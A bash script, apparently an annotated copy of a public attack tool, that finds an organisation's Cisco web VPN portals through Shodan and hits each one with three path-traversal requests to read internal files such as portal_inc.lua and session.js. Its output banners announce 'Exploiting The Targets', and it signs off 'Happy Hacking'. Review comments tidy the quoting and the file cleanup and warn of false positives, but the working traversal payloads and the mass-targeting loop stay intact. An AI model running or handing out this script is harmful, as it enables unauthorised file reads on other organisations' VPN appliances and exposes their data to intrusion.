#!/bin/bash

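# Ask for the organisation name. It is used below both as the Shodan "org:"
# filter and as the name of the output directory and file.
# -r keeps backslashes in the answer literal.
read -r -p "Enter organization name like google, apple: " orgz

# The answer becomes a path component, so refuse values that would escape or
# break the output location: empty input, "." / "..", anything containing a
# path separator, and anything starting with "-" (it would be parsed as an
# option by the file tools that receive it).
case "$orgz" in
  '' | . | .. | */* | -*)
    printf 'Invalid organization name: %s\n' "$orgz" >&2
    exit 1
    ;;
esac

# Quoted so a name containing spaces creates one directory, not several.
mkdir -p -- "$orgz"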

# Print how many Shodan records match the "set-cookie: webvpn;" banner
# filter for the organisation entered above.
echo -e "\n\e[93m[+]Total Targets Found On Shodan: \e[0m"
shodan count 'set-cookie: webvpn;' "org:${orgz}"

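echo -e "\n\e[93m[+]Targets IP\e[0m"
# List the matching addresses (ip_str field only), remove all whitespace,
# drop empty lines, then show the list and save it to <org>/<org>.txt.
# That file is the input of the three probe loops further down.
# The tee target is quoted so an organisation name containing spaces or glob
# characters still resolves to a single file.
shodan search --fields ip_str "set-cookie: webvpn;" org:"$orgz" \
  | sed -r -e 's/\s+//g' -e '/^$/d' \
  | tee -- "$orgz/$orgz.txt"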

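echo -e "\n\e[93m[+]Exploiting The Targets Part-1\e[0m\n"
# Check 1: for every address in <org>/<org>.txt, request portal_inc.lua
# through the oem-customization endpoint and classify the host by whether the
# reply body contains "Bad Request".
#
# NOTE(review): the verdict only means "no 'Bad Request' in the body". A host
# that is unreachable, times out or answers with an empty body also falls into
# the "May Be Vulnerable" branch, so each hit has to be confirmed before it is
# reported or acted on.
# NOTE(review): curl -k skips certificate validation, so the reply is not
# authenticated as coming from the listed host.
probe1_path='/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua'
while IFS= read -r host; do
  echo -e "==================================================="
  echo "$host"
  probe1_url="https://${host}${probe1_path}"
  if curl -s "$probe1_url" -k | grep 'Bad Request' &> /dev/null; then
    echo -e "\n\e[32m[-]Not Vulnerable\e[0m"
  else
    echo -e "\n\e[31m[+]May Be Vulnerable:\e[0m $probe1_url"
  fi
  echo ""
# Quoted redirect: an unquoted path with spaces is an "ambiguous redirect".
done < "$orgz/$orgz.txt"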

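echo -e "\n\e[93m[+]Exploiting The Targets Part-2\e[0m\n"
# Check 2: for every address in <org>/<org>.txt, request portal_inc.lua
# through the translation-table endpoint and classify the host by whether the
# reply body contains "Bad Request".
#
# NOTE(review): a missing "Bad Request" is not proof of anything by itself;
# unreachable hosts and empty replies are also printed as "May Be Vulnerable",
# so each hit has to be confirmed before it is reported or acted on.
# NOTE(review): curl -k skips certificate validation, so the reply is not
# authenticated as coming from the listed host.
probe2_path='/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../'
while IFS= read -r host; do
  echo -e "-----------------------------------------------------"
  echo "$host"
  probe2_url="https://${host}${probe2_path}"
  if curl -s "$probe2_url" -k | grep 'Bad Request' &> /dev/null; then
    echo -e "\n\e[32m[-]Not Vulnerable\e[0m"
  else
    echo -e "\n\e[31m[+]May Be Vulnerable:\e[0m $probe2_url"
  fi
  echo ""
# Quoted redirect: an unquoted path with spaces is an "ambiguous redirect".
done < "$orgz/$orgz.txt"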

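echo -e "\n\e[93m[+]Exploiting The Targets Part-3\e[0m\n"
# Check 3: for every address in <org>/<org>.txt, request session.js through
# the translation-table endpoint, save the reply to a file and classify the
# host by whether that file contains "Bad Request". Matching lines are printed
# because grep's output is not redirected here.
#
# The reply is kept in a private temporary file rather than ./session.js, and
# only that file is removed afterwards. The previous cleanup ran
# "rm -rf *.js" in the working directory, which deletes every *.js file or
# directory the operator happens to have there.
#
# NOTE(review): hosts for which curl itself fails print no verdict at all in
# this loop; a successful transfer without "Bad Request" in the body is
# printed as "May Be Vulnerable" and still needs confirmation.
# NOTE(review): curl -k skips certificate validation, so the reply is not
# authenticated as coming from the listed host.
probe3_path='/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/session.js&default-language&lang=../'
probe3_reply=$(mktemp) || {
  printf 'mktemp failed\n' >&2
  exit 1
}
while IFS= read -r host; do
  echo -e "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
  echo "$host"
  probe3_url="https://${host}${probe3_path}"
  # Start from an empty file so a reply with no body is never judged against
  # the previous host's content.
  : > "$probe3_reply"
  if curl -ks "$probe3_url" --output "$probe3_reply"; then
    if grep 'Bad Request' "$probe3_reply"; then
      echo -e "\n\e[32m[-]Not Vulnerable\e[0m"
    else
      echo -e "\n\e[31m[+]May Be Vulnerable:\e[0m $probe3_url"
    fi
  fi
# Quoted redirect: an unquoted path with spaces is an "ambiguous redirect".
done < "$orgz/$orgz.txt"
rm -f -- "$probe3_reply"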


# Closing banner: author credit and sign-off, printed with ANSI colour codes.
# echo joins its arguments with single spaces, so the array expands to the
# same line the four separate arguments produced.
banner_parts=(
  "\n\e[92mFollow Me On\e[0m"
  "\e[34mTwitter\e[0m"
  "\e[5m\e[93m@darklotuskdb\e[0m"
  "\e[92mHappy Hacking\e[0m"
)
echo -e "${banner_parts[@]}"
echo -e "\n\e[1mGood Day\e[0m\n"
